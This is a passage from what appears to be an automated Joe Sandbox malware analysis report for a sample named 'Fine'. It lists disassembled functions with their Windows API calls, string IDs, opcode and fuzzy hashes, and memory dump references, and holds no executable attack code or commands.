                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 412ec7a90eb3c64c5c3c0ec4998f616500fcfa46fe2f7bf95fd24c1d55f7b3d7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8919E74A20209EFCB04EF54D885DADB7B1FF49301F508059FD06AB292DBB1AE69CB54
                                                                                                                                                                                                                                                                                                                            Function 002457CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00245919
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ff3b34553b60c485e6fa90841b8907e4b1b5effed2985141c95c5d0b5fe31e04
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0fa7a002b6d409fb09a4ec3c43998e22065961489a3c822d6166ebe4f4b96eac
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff3b34553b60c485e6fa90841b8907e4b1b5effed2985141c95c5d0b5fe31e04
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6919F75A10625DFCB18DF54C484EAABBF1AF44304F188099E8899F363C771EE85CB90
                                                                                                                                                                                                                                                                                                                            Function 00235703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 002358AF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$Container
                                                                                                                                                                                                                                                                                                                            • API String ID: 3565006973-2464499141
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d3669e33ccb14329f488659e5cc9fa11579cd7085088779196bb6b55e50a048b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fc3bdc8125f7c67bb029a1e52ba60160f50ef82a340672a6067096b12fd4dc1a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3669e33ccb14329f488659e5cc9fa11579cd7085088779196bb6b55e50a048b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE8128B0610611EFDB14DF58C884B6ABBF9FF49710F10856EF94A8B291DBB0E855CB90
                                                                                                                                                                                                                                                                                                                            Function 001FE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 001FE67D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f39e07c8702f676672f068ab9491ae97999dbfdfdb4f28edfee054863f76c379
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 32a55475ea85a96e7a7f394033d53545c668950ba723b5d8332b61da6973799d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f39e07c8702f676672f068ab9491ae97999dbfdfdb4f28edfee054863f76c379
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44517971E2820A86C715BB14DD0137BBBE4AF50B50F204D58F1D9822FAEF358DE59E86
                                                                                                                                                                                                                                                                                                                            Function 001EA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 50704ae1a2495967239e2d38c50e450a96cc0511d8431574c0a3e7c212642018
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 40f748d1f883988f7d570c4b7673db524b711c6ea4f58af24bad8f4692dd03b6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50704ae1a2495967239e2d38c50e450a96cc0511d8431574c0a3e7c212642018
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23516634506297EFCB24EF68E040ABE3BA4AF21314FA54015F8819B2D1DB34ED92C761
                                                                                                                                                                                                                                                                                                                            Function 001EF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 001EF6DB
                                                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 001EF6F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9ab01753e15425ffe2b91e886de1f702456a7440c0f49854b6ae7e0770d9b8ac
                                                                                                                                                                                                                                                                                                                            • Instruction ID: df8fcb950b062302bbc20ab9571e91ab323d054a98960130aa72da9568079ec0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ab01753e15425ffe2b91e886de1f702456a7440c0f49854b6ae7e0770d9b8ac
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA514D714087489BD320AF51DC86BAFB7E8FFA5304F81485EF1D942191DF708529C766
                                                                                                                                                                                                                                                                                                                            Function 0024DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024DB75
                                                                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0024DB7F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1d037186e964e46c8c7cc95f4d83809cb12a2f4ac2a6270b39dc83da79892efc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 707d76bf474a487ce46b2a5dd1431e78ef05323d6a9441e137cbb9b750b8d023
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d037186e964e46c8c7cc95f4d83809cb12a2f4ac2a6270b39dc83da79892efc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24315E71C11119ABCF15DFA8CC85EEEBFB9FF14304F10002AF915A6262EB719A16DB50
                                                                                                                                                                                                                                                                                                                            Function 00264008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 002640BD
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002640F8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1d9be9c31bd01a850be2189c670b69bb3b3b6890ab7fb865f9816182979e98c6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fe6f3f80ea4527a8d49ca9be360293edbaf7ae98722ef5250c778aee24c41eaf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d9be9c31bd01a850be2189c670b69bb3b3b6890ab7fb865f9816182979e98c6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20319E71520615AADB24EF78CC80FFB73A9FF58724F008619F9A587190DA71AC91DB60
                                                                                                                                                                                                                                                                                                                            Function 00264FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002650BD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002650D2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 158fe881b4fe771e12e3a8253052e79dedb5d95b7d181b0c0f8e62aa9e3d7121
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 00cdc7df9fb37164fbb51388845612f468c71b0f4b4a488b0eda00aaffc143c4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 158fe881b4fe771e12e3a8253052e79dedb5d95b7d181b0c0f8e62aa9e3d7121
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E531F874A1161ADFDB14CF69C980BDABBB5FF49300F20406AE904AB351D771E995CF90
                                                                                                                                                                                                                                                                                                                            Function 001D20B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00213440
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002134CA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2181805148-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2e2284e84d5a3a445a43f96d2ae0318417f619ec7f83860f8fa5f6424140410b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9df26d3021de40f0b0f44075bbf708946b3bb9a14ff6b13e9974c83b40486e37
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e2284e84d5a3a445a43f96d2ae0318417f619ec7f83860f8fa5f6424140410b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF21AD31601144AFCB26DF68D8499E93BA6EF26360F248245FA254B3E2C7318EA5DA10
                                                                                                                                                                                                                                                                                                                            Function 002641AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00264216
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00264230
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ac97fe52e7d93cea23725cefdf4505458a8524793095e951df8d5bc54bda0b29
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ecd15039bde4d2c0807239fd146b7c155f1d0a48262946db05d9d3ba63e10969
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac97fe52e7d93cea23725cefdf4505458a8524793095e951df8d5bc54bda0b29
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83112972A2020AAFDB00DFA8DC45AEA7BA8EB08714F114515FD95E3250D774E8609B60
                                                                                                                                                                                                                                                                                                                            Function 0024D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0024D7C2
                                                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0024D7EB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5def31cf447ff9e6b6a5546ac6bb676d9439572aec3b2860fd8669b2bdf7e1f8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0f881f49d2561df91055988f4e0571f772d81d9a8092183d84e01befd9cde005
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5def31cf447ff9e6b6a5546ac6bb676d9439572aec3b2860fd8669b2bdf7e1f8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1311297166123679DB3C4F628C49EF7FE9CEB127A4F00421AF50983080D2A48850D2F0
                                                                                                                                                                                                                                                                                                                            Function 002375ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 0023761D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00237629
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c9e8ccd808627f10ee90c691dd851d386cb24a6af01febcda59bcf5cb5471d1a
